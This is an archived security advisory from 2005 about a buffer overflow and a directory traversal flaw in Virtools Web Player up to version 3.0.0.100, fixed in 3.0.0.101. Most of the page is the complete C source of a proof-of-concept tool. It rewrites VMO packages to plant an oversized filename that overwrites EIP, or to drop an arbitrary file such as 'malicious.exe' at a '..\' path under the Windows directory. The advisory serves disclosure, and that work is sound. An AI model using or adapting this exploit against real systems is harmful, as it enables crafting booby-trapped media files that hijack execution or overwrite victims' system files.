exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

virtools.3.0.0.100.txt

virtools.3.0.0.100.txt
Posted Oct 4, 2005
Authored by Luigi Auriemma | Site aluigi.altervista.org

Virtools versions less than of equal to 3.0.0.100 suffer from buffer-overflow and directory traversal vulnerabilities. Exploit provided.

tags | advisory, overflow, vulnerability
SHA-256 | 01f2aab1d108d9445193ba2dab20a8b555dd30b137981b97a6ffe0b1a1d62f0f

virtools.3.0.0.100.txt

Change Mirror Download

#######################################################################

Luigi Auriemma

Application: Virtools Web Player and probably also other applications
which can read the Virtools files but I can't test
http://www.virtools.com
Versions: <= 3.0.0.100
Platforms: Windows (seems also Mac is supported)
Bugs: A] buffer-overflow
B] directory traversal
Exploitation: remote/local
Date: 30 Sep 2005
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: http://aluigi.altervista.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Virtools is a set of applications for creating games, demos, CAD,
simulations and other multimedia stuff.
Virtools Web Player is the program which allows the usage of these
creations from the net through its implementation in the web browser.


#######################################################################

=======
2) Bugs
=======


Other than the scripts the Virtools packages (for example those with
extension VMO) contain also some additional files like mp3, wav, images
and so on which are extracted in a temporary folder in the system temp
directory like, for example, c:\windows\temp\VTmp26453


------------------
A] buffer-overflow
------------------

Exists a buffer-overflow bug which happens during the handling of the
names of the files contained in the Virtools packages.
A filename of at least 262 bytes overwrites the EIP register allowing
possible execution of malicious code.


----------------------
B] directory traversal
----------------------

As previously said the files are stored in a temporary directory and if
already exist files with the same names they are fully overwritten.
The problem here is that there are no checks on the filenames so the
usage of the classical "..\" patterns allows an attacker to overwrite
any file in the disk where is located the system temp folder (usually
c:\).


#######################################################################

===========
3) The Code
===========


http://aluigi.altervista.org/poc/virtbugs.zip


#######################################################################

======
4) Fix
======


Version 3.0.0.101


#######################################################################


---
Luigi Auriemma
http://aluigi.altervista.org

Exploit: virtbugs.c

/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#ifdef WIN32
#include <io.h>

typedef unsigned char u_char;
typedef unsigned int u_int;
#define ftruncate chsize
#else
#include <unistd.h>
#include <sys/types.h>
#endif



#define VER "0.1"
#define SIGN "Nemo"
#define FILE1 "components"
#define FILE2 "objects"
#define FMT "%-10u"
#define EIP "\xde\xc0\xad\xde"
#define BOF "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aa" EIP
#define BOFFILE "Nemo il pesce scemo"



u_int putfile(FILE *fdout, char *fname);
void std_err(void);



struct {
u_char sign[4];
u_int unknown1; // 0x694620
u_int crc; // ???
u_int unknown2; // big-endian sdk version?
u_int plugin1;
u_int plugin2;
u_int unknown3; // 12
u_int compcsz;
u_int objcsz;
u_int objsz;
u_int addpath; // ???
u_int components;
u_int objects;
u_int zero; // ???
u_int version;
u_int compsz;
} vmo;



int main(int argc, char *argv[]) {
FILE *fd;
u_int i,
len,
off;
int attack;
u_char fname[512],
*vmofile,
*addfile,
*addpath;


setbuf(stdout, NULL);

fputs("\n"
"Virtools <= 3.0.0.100 buffer-overflow and directory traversal bugs "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 3) {
printf("\n"
"Usage: %s <attack> <file.VMO>\n"
"\n"
"Attack:\n"
" 1 = buffer-overflow\n"
" 2 = directory traversal, is needed to specify also the file to add and the\n"
" special path for exploiting the bug\n"
"\n"
"Example: virtbugs 1 tintoys.vmo\n"
"Example: virtbugs 2 tintoys.vmo malicious.exe ..\\..\\..\\..\\windows\\runme.pif\n"
"Note: will be replaced only the latest file in the package\n"
"Note: if you need a quick VMO file use the following:\n"
" http://www.virtools.com/downloads/vmo/Tintoys/tintoys.vmo"
"\n", argv[0]);
exit(1);
}

attack = atoi(argv[1]);
vmofile = argv[2];

if((attack != 1) && (attack != 2)) {
fputs("\nError: wrong attack number chosen\n\n", stdout);
exit(1);
}

printf("- open VMO file: %s\n", vmofile);
fd = fopen(vmofile, "r+b");
if(!fd) std_err();

if(!fread(&vmo, sizeof(vmo), 1, fd)) std_err();
off = ftell(fd);

if(memcmp(vmo.sign, SIGN, sizeof(vmo.sign))) {
printf("- file seems invalid, its sign is: %.*s\n",
sizeof(vmo.sign), vmo.sign);
}

printf(
" Informations and files list:\n"
"- components: %u\n"
"- objects: %u\n"
"- version: %hhu.%hhu.%hhu.%hhu\n"
"\n",
vmo.components,
vmo.objects,
(vmo.version >> 24) & 0xff, (vmo.version >> 16) & 0xff,
(vmo.version >> 8) & 0xff, vmo.version & 0xff);

fputs(
" inSize outSize Filename\n"
" ------------------------------\n", stdout);

printf(" "FMT" "FMT" %s\n", vmo.compcsz, vmo.compsz, FILE1);
printf(" "FMT" "FMT" %s\n", vmo.objcsz, vmo.objsz, FILE2);
if(fseek(fd, off + vmo.compcsz + vmo.objcsz, SEEK_SET) < 0) std_err();

for(i = 2; ; i++) {
if(!fread(&len, 4, 1, fd)) break;
off = ftell(fd) - 4;
if(!fread(fname, len, 1, fd)) break;

if(len > (sizeof(fname) - 1)) break; // checks
fname[len] = 0;
if(!*fname) break;

if(!fread(&len, 4, 1, fd)) break;
printf(" "FMT" %s\n", len, fname);

if(fseek(fd, len, SEEK_CUR) < 0) std_err();
}

if(i <= 2) {
fputs("\n"
"Error: your VMO file doesn't contain additional files so cannot be modified\n"
" try with another\n"
"\n", stdout);
exit(1);
}

fseek(fd, off, SEEK_SET);

if(attack == 1) {
fputs("\n- buffer-overflow bug exploitation\n", stdout);
len = sizeof(BOF) - 1;
fwrite(&len, 4, 1, fd);
fwrite(BOF, len, 1, fd);

len = sizeof(BOFFILE) - 1;
fwrite(&len, 4, 1, fd);
fwrite(BOFFILE, len, 1, fd);

} else if(attack == 2) {
fputs("\n- directory traversal bug exploitation\n", stdout);
if(argc < 5) {
fputs("\nError: you must specify also <your_file> and <bad_path>\n\n", stdout);
exit(1);
}
addfile = argv[3];
addpath = argv[4];

len = strlen(addpath);
fwrite(&len, 4, 1, fd);
fwrite(addpath, len, 1, fd);

len = putfile(fd, addfile);
}

fflush(fd);
if(ftruncate(fileno(fd), ftell(fd)) < 0) std_err();
fflush(fd);
fclose(fd);
printf("- added a file of %u bytes\n", len);
return(0);
}



u_int putfile(FILE *fdout, char *fname) {
struct stat xstat;
FILE *fdin;
u_int len,
tot = 0;
u_char buff[1024];

fdin = fopen(fname, "rb");
if(!fdin) std_err();
fstat(fileno(fdin), &xstat);

fwrite(&xstat.st_size, 4, 1, fdout);

while((len = fread(buff, 1, sizeof(buff), fdin))) {
fwrite(buff, len, 1, fdout);
tot += len;
}

fclose(fdin);
return(tot);
}



void std_err(void) {
perror("\nError");
exit(1);
}


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close